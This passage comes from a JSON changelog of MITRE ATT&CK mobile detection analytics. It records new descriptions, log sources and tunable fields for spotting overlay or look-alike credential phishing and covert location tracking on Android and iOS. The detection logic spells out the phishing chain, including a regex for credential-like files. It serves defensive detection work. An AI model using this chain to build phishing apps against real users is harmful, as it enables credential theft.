view which applications have the permission to access the device location through the device settings screen and revoke permissions as necessary. \\n-Android applications requesting the `ACCESS_COARSE_LOCATION`, `ACCESS_FINE_LOCATION`, or `ACCESS_BACKGROUND_LOCATION` permissions and iOS applications including the `NSLocationWhenInUseUsageDescription`, `NSLocationAlwaysAndWhenInUseUsageDescription`, and/or `NSLocationAlwaysUsageDescription` keys in their `Info.plist` file could be scrutinized during the application vetting process. \\n+Defender correlates an application\\u2019s location authorization level (When-In-Use vs Always) and entitlement posture with observed location sensor activity that occurs without proximate user interaction, including background updates, followed by periodic outbound network sessions aligned to location update timing\\u2014suggesting covert or policy-violating location tracking.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Application activates CoreLocation services or CLLocationManager APIs\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"App installed with location usage declarations (WhenInUse/Always usage description) and granted authorization level via managed policy state\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to189__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to189__0\"><a href=\"#difflib_chg_to189__top\">t</a></td><td class=\"diff_header\" id=\"from189_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">In&nbsp;both&nbsp;Android&nbsp;(6.0&nbsp;and&nbsp;up)&nbsp;and&nbsp;iOS,&nbsp;the&nbsp;user&nbsp;can&nbsp;view&nbsp;whic</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to189__top\">t</a></td><td class=\"diff_header\" id=\"to189_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;an&nbsp;application\u2019s&nbsp;location&nbsp;authorization&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">h&nbsp;applications&nbsp;have&nbsp;the&nbsp;permission&nbsp;to&nbsp;access&nbsp;the&nbsp;device&nbsp;loca</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">level&nbsp;(When-In-Use&nbsp;vs&nbsp;Always)&nbsp;and&nbsp;entitlement&nbsp;posture&nbsp;with&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tion&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;screen&nbsp;and&nbsp;revoke&nbsp;permissio</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">bserved&nbsp;location&nbsp;sensor&nbsp;activity&nbsp;that&nbsp;occurs&nbsp;without&nbsp;proxima</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ns&nbsp;as&nbsp;necessary.&nbsp;&nbsp;Android&nbsp;applications&nbsp;requesting&nbsp;the&nbsp;`ACCES</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">te&nbsp;user&nbsp;interaction,&nbsp;including&nbsp;background&nbsp;updates,&nbsp;followed&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">S_COARSE_LOCATION`,&nbsp;`ACCESS_FINE_LOCATION`,&nbsp;or&nbsp;`ACCESS_BACKG</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">by&nbsp;periodic&nbsp;outbound&nbsp;network&nbsp;sessions&nbsp;aligned&nbsp;to&nbsp;location&nbsp;up</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ROUND_LOCATION`&nbsp;permissions&nbsp;and&nbsp;iOS&nbsp;applications&nbsp;including&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">date&nbsp;timing\u2014suggesting&nbsp;covert&nbsp;or&nbsp;policy-violating&nbsp;location&nbsp;t</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">he&nbsp;`NSLocationWhenInUseUsageDescription`,&nbsp;`NSLocationAlwaysA</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">racking.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ndWhenInUseUsageDescription`,&nbsp;and/or&nbsp;`NSLocationAlwaysUsageD</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">escription`&nbsp;keys&nbsp;in&nbsp;their&nbsp;`Info.plist`&nbsp;file&nbsp;could&nbsp;be&nbsp;scrutin</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ized&nbsp;during&nbsp;the&nbsp;application&nbsp;vetting&nbsp;process.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--2867d1e0-cf83-4d83-bc6c-cc03404c3521",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 19:36:34.664000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0676#AN1778",
                            "external_id": "AN1778"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1778",
                    "description": "Defender correlates an app preparing to phish (gaining overlay/notification/accessibility capability) with precise foreground targeting (reading activity in front via accessibility/focus) and then presenting a look-alike UI (overlay window or activity-on-top) immediately before local storage or small-burst egress of entered data. Chain: capability/permission \u2192 target app in foreground detected \u2192 overlay/activity-on-top or fake notification tap \u2192 local prompt input write \u2192 near-term network egress.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                            "name": "android:logcat",
                            "channel": "Grant/enablement of SYSTEM_ALERT_WINDOW, BIND_ACCESSIBILITY_SERVICE, POST_NOTIFICATIONS for <pkg>"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "TYPE_WINDOW_STATE_CHANGED / TYPE_VIEW_FOCUSED shows foreign target package in foreground"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "android:logcat",
                            "channel": "addView TYPE_APPLICATION_OVERLAY|TYPE_APPLICATION_ATTACHED_DIALOG shown over <target_pkg>"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "android:logcat",
                            "channel": "startActivity on top of <target_pkg> (launchMode/singleTop), task switch immediately after focus"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(creds|form|prompt).*\\\\.(db|sqlite|json|txt)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max time from overlay/activity to persist/exfil (e.g., 5\u201360s)."
                        },
                        {
                            "field": "OverlayRequired",
                            "description": "Require overlay evidence unless activity-on-top is observed (true/false)."
                        },
                        {
                            "field": "TargetPkgWatchlist",
                            "description": "List of high-value target packages (banking, identity) to raise severity."
                        },
                        {
                            "field": "PersistPathRegex",
                            "description": "Regex for local prompt data artifacts."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Known-good analytics/CDN/service domains to suppress FPs."
                        },
                        {
                            "field": "UserContext",
                            "description": "Work Profile/Kiosk mode/Accessibility allowlist to scope benign cases."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max time from overlay/activity to persist/exfil (e.g., 5\\u201360s).\"}, {\"field\": \"OverlayRequired\", \"description\": \"Require overlay evidence unless activity-on-top is observed (true/false).\"}, {\"field\": \"TargetPkgWatchlist\", \"description\": \"List of high-value target packages (banking, identity) to raise severity.\"}, {\"field\": \"PersistPathRegex\", \"description\": \"Regex for local prompt data artifacts.\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Known-good analytics/CDN/service domains to suppress FPs.\"}, {\"field\": \"UserContext\", \"description\": \"Work Profile/Kiosk mode/Accessibility allowlist to scope benign cases.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 19:36:34.664000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates an app preparing to phish (gaining overlay/notification/accessibility capability) with precise foreground targeting (reading activity in front via accessibility/focus) and then presenting a look-alike UI (overlay window or activity-on-top) immediately before local storage or small-burst egress of entered data. Chain: capability/permission \\u2192 target app in foreground detected \\u2192 overlay/activity-on-top or fake notification tap \\u2192 local prompt input write \\u2192 near-term network egress.\", \"old_value\": \"An Android user can view and manage which applications hold the `SYSTEM_ALERT_WINDOW` permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions). \\nApplication vetting services can look for applications requesting the `android.permission.SYSTEM_ALERT_WINDOW` permission in the list of permissions in the app manifest. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-An Android user can view and manage which applications hold the `SYSTEM_ALERT_WINDOW` permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions). \\n-Application vetting services can look for applications requesting the `android.permission.SYSTEM_ALERT_WINDOW` permission in the list of permissions in the app manifest. \\n+Defender correlates an app preparing to phish (gaining overlay/notification/accessibility capability) with precise foreground targeting (reading activity in front via accessibility/focus) and then presenting a look-alike UI (overlay window or activity-on-top) immediately before local storage or small-burst egress of entered data. Chain: capability/permission \\u2192 target app in foreground detected \\u2192 overlay/activity-on-top or fake notification tap \\u2192 local prompt input write \\u2192 near-term network egress.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6\", \"name\": \"android:logcat\", \"channel\": \"Grant/enablement of SYSTEM_ALERT_WINDOW, BIND_ACCESSIBILITY_SERVICE, POST_NOTIFICATIONS for <pkg>\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"TYPE_WINDOW_STATE_CHANGED / TYPE_VIEW_FOCUSED shows foreign target package in foreground\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"android:logcat\", \"channel\": \"addView TYPE_APPLICATION_OVERLAY|TYPE_APPLICATION_ATTACHED_DIALOG shown over <target_pkg>\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"android:logcat\", \"channel\": \"startActivity on top of <target_pkg> (launchMode/singleTop), task switch immediately after focus\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE to /data/data/<pkg>/(files|databases)/(creds|form|prompt).*\\\\\\\\.(db|sqlite|json|txt)\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to150__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to150__0\"><a href=\"#difflib_chg_to150__top\">t</a></td><td class=\"diff_header\" id=\"from150_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">An&nbsp;Android&nbsp;user&nbsp;can&nbsp;view&nbsp;and&nbsp;manage&nbsp;which&nbsp;applications&nbsp;hold&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to150__top\">t</a></td><td class=\"diff_header\" id=\"to150_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;an&nbsp;app&nbsp;preparing&nbsp;to&nbsp;phish&nbsp;(gaining&nbsp;overl</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">the&nbsp;`SYSTEM_ALERT_WINDOW`&nbsp;permission&nbsp;through&nbsp;the&nbsp;device&nbsp;sett</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ay/notification/accessibility&nbsp;capability)&nbsp;with&nbsp;precise&nbsp;foreg</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ings&nbsp;in&nbsp;Apps&nbsp;&amp;&nbsp;notifications&nbsp;-&gt;&nbsp;Special&nbsp;app&nbsp;access&nbsp;-&gt;&nbsp;Displa</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">round&nbsp;targeting&nbsp;(reading&nbsp;activity&nbsp;in&nbsp;front&nbsp;via&nbsp;accessibility</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">y&nbsp;over&nbsp;other&nbsp;apps&nbsp;(the&nbsp;exact&nbsp;menu&nbsp;location&nbsp;may&nbsp;vary&nbsp;between&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">/focus)&nbsp;and&nbsp;then&nbsp;presenting&nbsp;a&nbsp;look-alike&nbsp;UI&nbsp;(overlay&nbsp;window&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Android&nbsp;versions).&nbsp;&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;look&nbsp;fo</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">or&nbsp;activity-on-top)&nbsp;immediately&nbsp;before&nbsp;local&nbsp;storage&nbsp;or&nbsp;smal</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">r&nbsp;applications&nbsp;requesting&nbsp;the&nbsp;`android.permission.SYSTEM_ALE</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">l-burst&nbsp;egress&nbsp;of&nbsp;entered&nbsp;data.&nbsp;Chain:&nbsp;capability/permission</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">RT_WINDOW`&nbsp;permission&nbsp;in&nbsp;the&nbsp;list&nbsp;of&nbsp;permissions&nbsp;in&nbsp;the&nbsp;app&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;\u2192&nbsp;target&nbsp;app&nbsp;in&nbsp;foreground&nbsp;detected&nbsp;\u2192&nbsp;overlay/activity-on-t</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">manifest.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">op&nbsp;or&nbsp;fake&nbsp;notification&nbsp;tap&nbsp;\u2192&nbsp;local&nbsp;prompt&nbsp;input&nbsp;write&nbsp;\u2192&nbsp;nea</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r-term&nbsp;network&nbsp;egress.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--8062d295-9d02-40c5-9ef9-135d08c07a22",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 19:53:20.408000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0676#AN1779",
                            "external_id": "AN1779"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1779",
                    "description": "Defender correlates a look-alike prompt inside an app (e.g., faux Apple ID password view, webview of brand login) with timing against scene/foreground activation, optional push notification bait, then local form cache writes and/or small egress. Chain: scene activation around sensitive UI \u2192 suspicious prompt creation (UIKit events without expected auth controller) or webview navigated to look-alike domain \u2192 local cache write \u2192 near-term egress",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "iOS:unifiedlog",
                            "channel": "Presentation of credential-like view (UIAlertController with text fields / custom modal) not backed by system auth controller; frequent editingChanged in secureTextEntry fields"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                            "name": "iOS:unifiedlog",
                            "channel": "Scene/foreground transitions for <bundle_id> to contextualize timing"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "iOS:unifiedlog",
                            "channel": "WKWebView navigation to domain visually similar to target brand (IDN/punycode/alike score)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of form cache/credential-like artifacts (forms.db, creds.json) in container"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max time from prompt to persist/exfil (e.g., 5\u201360s)."
                        },
                        {
                            "field": "LookalikeDomainScore",
                            "description": "Threshold for domain visual similarity (e.g., \u22650.85)."
                        },
                        {
                            "field": "PersistPathRegex",
                            "description": "Regex for credential/form cache artifacts in container."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Enterprise/analytics endpoints to suppress FPs"
                        },
                        {
                            "field": "UserContext",
                            "description": "MDM policy, Focus mode, foreground requirement."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max time from prompt to persist/exfil (e.g., 5\\u201360s).\"}, {\"field\": \"LookalikeDomainScore\", \"description\": \"Threshold for domain visual similarity (e.g., \\u22650.85).\"}, {\"field\": \"PersistPathRegex\", \"description\": \"Regex for credential/form cache artifacts in container.\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Enterprise/analytics endpoints to suppress FPs\"}, {\"field\": \"UserContext\", \"description\": \"MDM policy, Focus mode, foreground requirement.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 19:53:20.408000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates a look-alike prompt inside an app (e.g., faux Apple ID password view, webview of brand login) with timing against scene/foreground activation, optional push notification bait, then local form cache writes and/or small egress. Chain: scene activation around sensitive UI \\u2192 suspicious prompt creation (UIKit events without expected auth controller) or webview navigated to look-alike domain \\u2192 local cache write \\u2192 near-term egress\", \"old_value\": \"An Android user can view and manage which applications hold the `SYSTEM_ALERT_WINDOW` permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions). \\nApplication vetting services can look for applications requesting the `android.permission.SYSTEM_ALERT_WINDOW` permission in the list of permissions in the app manifest. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-An Android user can view and manage which applications hold the `SYSTEM_ALERT_WINDOW` permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions). \\n-Application vetting services can look for applications requesting the `android.permission.SYSTEM_ALERT_WINDOW` permission in the list of permissions in the app manifest. \\n+Defender correlates a look-alike prompt inside an app (e.g., faux Apple ID password view, webview of brand login) with timing against scene/foreground activation, optional push notification bait, then local form cache writes and/or small egress. Chain: scene activation around sensitive UI \\u2192 suspicious prompt creation (UIKit events without expected auth controller) or webview navigated to look-alike domain \\u2192 local cache write \\u2192 near-term egress\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Presentation of credential-like view (UIAlertController with text fields / custom modal) not backed by system auth controller; frequent editingChanged in secureTextEntry fields\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Scene/foreground transitions for <bundle_id> to contextualize timing\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"iOS:unifiedlog\", \"channel\": \"WKWebView navigation to domain visually similar to target brand (IDN/punycode/alike score)\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of form cache/credential-like artifacts (forms.db, creds.json) in container\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to88__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to88__0\"><a href=\"#difflib_chg_to88__top\">t</a></td><td class=\"diff_header\" id=\"from88_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">An&nbsp;Android&nbsp;user&nbsp;can&nbsp;view&nbsp;and&nbsp;manage&nbsp;which&nbsp;applications&nbsp;hold&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to88__top\">t</a></td><td class=\"diff_header\" id=\"to88_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;a&nbsp;look-alike&nbsp;prompt&nbsp;inside&nbsp;an&nbsp;app&nbsp;(e.g.,</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">the&nbsp;`SYSTEM_ALERT_WINDOW`&nbsp;permission&nbsp;through&nbsp;the&nbsp;device&nbsp;sett</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;faux&nbsp;Apple&nbsp;ID&nbsp;password&nbsp;view,&nbsp;webview&nbsp;of&nbsp;brand&nbsp;login)&nbsp;with&nbsp;t</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ings&nbsp;in&nbsp;Apps&nbsp;&amp;&nbsp;notifications&nbsp;-&gt;&nbsp;Special&nbsp;app&nbsp;access&nbsp;-&gt;&nbsp;Displa</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">iming&nbsp;against&nbsp;scene/foreground&nbsp;activation,&nbsp;optional&nbsp;push&nbsp;not</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">y&nbsp;over&nbsp;other&nbsp;apps&nbsp;(the&nbsp;exact&nbsp;menu&nbsp;location&nbsp;may&nbsp;vary&nbsp;between&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ification&nbsp;bait,&nbsp;then&nbsp;local&nbsp;form&nbsp;cache&nbsp;writes&nbsp;and/or&nbsp;small&nbsp;eg</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 